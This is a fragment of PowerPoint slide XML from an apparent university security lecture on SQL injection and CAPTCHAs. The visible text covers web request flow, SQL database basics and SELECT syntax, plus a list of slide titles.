          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2196700" y="2880725"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="2196700" y="2880725"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="166" name="Google Shape;166;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2196700" y="3219425"/>
              <a:ext cx="15021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67" name="Google Shape;167;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2196700" y="2880725"/>
              <a:ext cx="15021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7. HTTP response</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572450" y="2301475"/>
            <a:ext cx="1502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1. User requests page</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572450" y="2880725"/>
            <a:ext cx="1502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8. Browser renders page</a:t>
            </a:r>
            <a:endParaRPr sz="1000"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2233300" y="4206575"/>
            <a:ext cx="1428900" cy="338700"/>
            <a:chOff x="2233300" y="4206575"/>
            <a:chExt cx="1428900" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="171" name="Google Shape;171;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2595100" y="4206575"/>
              <a:ext cx="705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/>
                <a:t>HTTP</a:t>
              </a:r>
              <a:endParaRPr sz="1000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="172" name="Google Shape;172;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="171" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2233300" y="4375925"/>
              <a:ext cx="361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  <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="173" name="Google Shape;173;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="171" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3300400" y="4375925"/>
              <a:ext cx="361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174" name="Google Shape;174;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5481800" y="4129625"/>
            <a:ext cx="1428900" cy="492600"/>
            <a:chOff x="5481800" y="4129625"/>
            <a:chExt cx="1428900" cy="492600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="175" name="Google Shape;175;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5843600" y="4129625"/>
              <a:ext cx="705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/>
                <a:t>SQL (usually)</a:t>
              </a:r>
              <a:endParaRPr sz="1000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="176" name="Google Shape;176;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="175" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5481800" y="4375925"/>
              <a:ext cx="361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  <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="177" name="Google Shape;177;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="175" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6548900" y="4375925"/>
              <a:ext cx="3618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Databases</a:t>
            </a:r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For this class, we will cover SQL databases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SQL = Structured Query Language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Each database has a number of tables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Each table has a predefined structure, so it has columns for each field and rows for each entry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Database server manages access and storage of these databases</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="185" name="Google Shape;185;p27"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="21460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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Google Shape;191;p28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8520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/>
              <a:t>Structured Query Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>): The language used to interact with and manage data stored in a database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Defined by the International Organization for Standardization (ISO) and implemented by many SQL servers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Good SQL servers are ACID (atomicity, consistency, isolation, and durability)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Essentially ensures that the database will never store a partial operation, return an invalid state, or be vulnerable to race conditions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Declarative programming language, rather than imperative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Declarative: Use code to define the result you want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Imperative: Use code to define exactly what to do (e.g. C, Python, Go)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;19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102700" y="27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SQL: SELECT</a:t>
            </a:r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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1246825"/>
            <a:ext cx="5142600" cy="3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 is used to select some columns from a table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Syntax:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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SELECT [columns] FROM [table]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9" name="Google Shape;19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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="200" name="Google Shape;200;p29"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="2146000"/>
          <a:ext cx="3532900" cy="2194380"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{DFD17B31-A734-46B0-8B05-200C5F750624}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3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4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9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bots</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="1" i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id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age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evanbot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pancakes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codabot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hashes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pintobot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beans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1.5</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"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 rows, 4 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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CS 16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3761</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>888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3" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>CS 161</vt:lpstr>
      <vt:lpstr>SQL Injection and CAPTCHAs</vt:lpstr>
      <vt:lpstr>Today: SQL Injection and CAPTCHAS</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Top 25 Most Dangerous Software Weaknesses (2020)</vt:lpstr>
      <vt:lpstr>Structure of Web Services</vt:lpstr>
      <vt:lpstr>Structure of Web Services</vt:lpstr>
      <vt:lpstr>Databases</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>SQL: SELECT</vt:lpstr>
      <vt:lpstr>SQL: SELECT</vt:lpstr>
      <vt:lpstr>SQL: SELECT</vt:lpstr>
      <vt:lpstr>SQL: SELECT</vt:lpstr>
      <vt:lpstr>SQL: WHERE</vt:lpstr>
      <vt:lpstr>SQL: WHERE</vt:lpstr>
      <vt:lpstr>SQL: WHERE</vt:lpstr>
      <vt:lpstr>SQL: INSERT INTO</vt:lpstr>
      <vt:lpstr>SQL: INSERT INTO</vt:lpstr>
      <vt:lpstr>SQL: UPDATE</vt:lpstr>
      <vt:lpstr>SQL: UPDATE</vt:lpstr>
      <vt:lpstr>SQL: DELETE</vt:lpstr>
      <vt:lpstr>SQL: DELETE</vt:lpstr>
      <vt:lpstr>SQL: CREATE</vt:lpstr>
      <vt:lpstr>SQL: CREATE</vt:lpstr>
      <vt:lpstr>SQL: DROP</vt:lpstr>
      <vt:lpstr>SQL: DROP</vt:lpstr>
      <vt:lpstr>SQL: Syntax Characters</vt:lpstr>
      <vt:lpstr>A Go HTTP Handler (Again)</vt:lpstr>
      <vt:lpstr>A Go HTTP Handler (Again)</vt:lpstr>
      <vt:lpstr>A Go HTTP Handler (Again)</vt:lpstr>
      <vt:lpstr>A Go HTTP Handler (Again)</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection Tools</vt:lpstr>
      <vt:lpstr>SQL Injection Defenses</vt:lpstr>
      <vt:lpstr>SQL Injection Defenses</vt:lpstr>
      <vt:lpstr>SQL Injection Defenses</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>system Command Injection</vt:lpstr>
      <vt:lpstr>system Command Injection</vt:lpstr>
      <vt:lpstr>Defending Against Command Injection in General</vt:lpstr>
      <vt:lpstr>CAPTCHAs</vt:lpstr>
      <vt:lpstr>Websites are for Humans</vt:lpstr>
      <vt:lpstr>CAPTCHAs: Definition</vt:lpstr>
      <vt:lpstr>CAPTCHAs: Examples</vt:lpstr>
      <vt:lpstr>CAPTCHAs and Machine Learning</vt:lpstr>
      <vt:lpstr>CAPTCHAs: Issues</vt:lpstr>
      <vt:lpstr>CAPTCHAs: Attacks</vt:lpstr>
      <vt:lpstr>SQL Injection: Summary</vt:lpstr>
      <vt:lpstr>CAPTCHAs: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Injection and CAPTCHAs</dc:title>
  <cp:lastModifiedBy>Jian Xiang</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-19T13:38:29Z</dcterms:modified>
</cp:coreProperties>
</file>